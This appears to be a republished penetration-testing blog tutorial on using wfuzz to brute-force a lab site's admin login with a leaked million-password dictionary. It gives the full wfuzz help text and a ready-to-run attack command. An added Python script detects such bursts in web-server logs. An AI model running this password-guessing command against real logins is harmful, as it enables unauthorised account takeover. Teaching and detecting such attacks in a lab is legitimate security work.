50. Network Security Penetration Testing - [Brute-Force Part 13] - [wfuzz: Multi-Threaded Million-Password Test Against a Specified Backend Login]


I believe: whether you are studying security or working in it, everyone carries at least a little passion and a sense of mission!!!

1. Multi-threaded million-password test against a specified backend login

1) Explanations:

00 wfuzz: "w" stands for web, "fuzz" for fuzz testing.

01 Target machine backend login page: http://www.blogs.com/admin/index.php?action=login

02 Million-password dictionary: csdnpass.txt
    # Note: Burp Intruder is not suitable here; the dictionary is too large
    # Instead, we use wfuzz for the brute-force run


03 wfuzz: a tool shipped with Kali
    wfuzz --help
    
    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
    
    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    *                                                      *
    * Version up to 1.4c coded by:                         *
    * Christian Martorella (cmartorella@edge-security.com) *
    * Carlos del ojo (deepbit@gmail.com)                   *
    *                                                      *
    * Version 1.4d to 2.4.5 coded by:                      *
    * Xavier Mendez (xmendez@edge-security.com)            *
    ********************************************************
    
    Usage:    wfuzz [options] -z payload,params <url>
    
        FUZZ, ..., FUZnZ  wherever you put these keywords wfuzz will replace them with the values of the specified payload.
        FUZZ{ baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
    
    
    Options:
        -h/--help                 : This help
        --help                    : Advanced help
        --filter-help             : Filter language specification
        --version                 : Wfuzz version details
        -e <type>                 : List of available encoders/payloads/iterators/printers/scripts
        
        --recipe <filename>       : Reads options from a recipe. Repeat for various recipes.
        --dump-recipe <filename>  : Prints current options as a recipe
        --oF <filename>           : Saves fuzz results to a file. These can be consumed later using the wfuzz payload.
        
        -c                        : Output with colors
        -v                        : Verbose information.
        -f filename,printer       : Store results in the output file using the specified printer (raw printer if omitted).
        -o printer                : Show results using the specified printer.
        --interact                : (beta) If selected,all key presses are captured. This allows you to interact with the program.
        --dry-run                 : Print the results of applying the requests without actually making any HTTP request.
        --prev                    : Print the previous HTTP requests (only when using payloads generating fuzzresults)
        --efield <expr>           : Show the specified language expression together with the current payload
        --field <expr>            : Do not show the payload but only the specified language expression
        
        -p addr                   : Use Proxy in format ip:port:type. Repeat option for using various proxies.
                                    Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
        
        -t N                      : Specify the number of concurrent connections (10 default)
        -s N                      : Specify time delay between requests (0 default)
        -R depth                  : Recursive path discovery being depth the maximum recursion level.
        -L,--follow               : Follow HTTP redirections
        --ip host:port            : Specify an IP to connect to instead of the URL's host in the format ip:port
        -Z                        : Scan mode (Connection errors will be ignored).
        --req-delay N             : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
        --conn-delay N            : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.
        
        -A, --AA, --AAA           : Alias for --script=default,verbose,discovery -v -c
        --no-cache                : Disable plugins cache. Every request will be scanned.
        --script=                 : Equivalent to --script=default
        --script=<plugins>        : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
        --script-help=<plugins>   : Show help about scripts.
        --script-args n1=v1,...   : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"
        
        -u url                    : Specify a URL for the request.
        -m iterator               : Specify an iterator for combining payloads (product by default)
        -z payload                : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
                                    A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
                                    Encoders category can be used. ie. url
                                    Use help as a payload to show payload plugin's details (you can filter using --slice)
        --zP <params>             : Arguments for the specified payload (it must be preceded by -z or -w).
        --zD <default>            : Default parameter for the specified payload (it must be preceded by -z or -w).
        --zE <encoder>            : Encoder for the specified payload (it must be preceded by -z or -w).
        --slice <filter>          : Filter payload's elements using the specified expression. It must be preceded by -z.
        -w wordlist               : Specify a wordlist file (alias for -z file,wordlist).
        -V alltype                : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
        -X method                 : Specify an HTTP method for the request, ie. HEAD or FUZZ
        
        -b cookie                 : Specify a cookie for the requests. Repeat option for various cookies.
        -d postdata               : Use post data (ex: "id=FUZZ&catalogue=1")
        -H header                 : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
        --basic/ntlm/digest auth  : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
        
        --hc/hl/hw/hh N[,N]+      : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
        --sc/sl/sw/sh N[,N]+      : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
        --ss/hs regex             : Show/hide responses with the specified regex within the content
        --filter <filter>         : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
        --prefilter <filter>      : Filter items before fuzzing using the specified expression.


04 wfuzz usage:
    wfuzz -c -z file,/pentest/csdnpass.txt --hc 200 -u http://www.blogs.com/admin/index.php?action=login -d "user=admin&pw=FUZZ" -v
    # Note: FUZZ is the password placeholder; --hc 200 hides responses with status 200 (the re-served login form), so only differing responses are shown


05 Note:
    /etc/hosts entry: 192.168.97.131 www.blogs.com
    # Connectivity test: curl www.blogs.com

2) Example:

(1) Run in Kali:

wfuzz -c -z file,csdnpass.txt --hc 200 -u http://www.blogs.com/admin/index.php?action=login -d "user=admin&pw=FUZZ" -v
# Note: FUZZ is the password placeholder

(2) Try logging in with the recovered password:

[screenshots omitted]
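As an added defensive counterpart (not part of the original post), the following Python script looks for the footprint that a run like the one above leaves in the web server's access log: a burst of POSTs to the login action from one client, almost all answered with 200 (the status wfuzz hides with `--hc 200`), possibly followed by a 302 redirect once a guess succeeds. The log lines, IP addresses and thresholds are constructed for illustration; only the login path is taken from the post.

```python
import re
from collections import defaultdict
from datetime import datetime

LOGIN_PATH = "/admin/index.php?action=login"   # the login action named in the post
LOG_RE = re.compile(  # Apache "combined" log format
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def _line(ip, sec, method, status, ua):
    # Build one constructed access-log line (sample data, not a real capture)
    return (f'{ip} - - [10/Aug/2021:14:02:{sec:02d} +0800] "{method} {LOGIN_PATH} HTTP/1.1" '
            f'{status} 1342 "-" "{ua}"')

# Constructed sample: 11 failed POSTs (200 = login form re-served) from one client within
# a few seconds, then a 302 (redirect after success); a second client behaves normally.
ATTACKER = "192.168.97.1"
SAMPLE_LOG = ([_line(ATTACKER, i // 5, "POST", 200, "Wfuzz/2.4.5") for i in range(11)]
              + [_line(ATTACKER, 3, "POST", 302, "Wfuzz/2.4.5"),
                 _line("192.168.97.50", 5, "GET", 200, "Mozilla/5.0"),
                 _line("192.168.97.50", 9, "POST", 200, "Mozilla/5.0")])

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect_bruteforce(lines, threshold=10, window_s=60):
    """Flag clients sending >= threshold login POSTs within any window_s-second span.
    Counts requests rather than User-Agent strings, since a UA is trivially changed."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            by_ip[rec["ip"]].append(rec)
    alerts = {}
    for ip, reqs in by_ip.items():
        reqs.sort(key=lambda r: r["ts"])
        lo = 0
        for hi in range(len(reqs)):            # sliding window over sorted timestamps
            while (reqs[hi]["ts"] - reqs[lo]["ts"]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 >= threshold:
                alerts[ip] = {"attempts": len(reqs),
                              "failed_200": sum(r["status"] == 200 for r in reqs),
                              "redirect_after_failures": reqs[-1]["status"] == 302}
                break
    return alerts
```

A 200-heavy burst followed by a 302 from the same client is the signal to act on: lock or rate-limit the account, and treat the 302 as a probable compromise rather than a normal login.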

This article was collected automatically from the internet or republished with the author's permission; the views expressed do not represent the site's position. If it infringes your rights, contact us to have it taken down. Source: https://blog.csdn.net/qq_45555226/article/details/119429098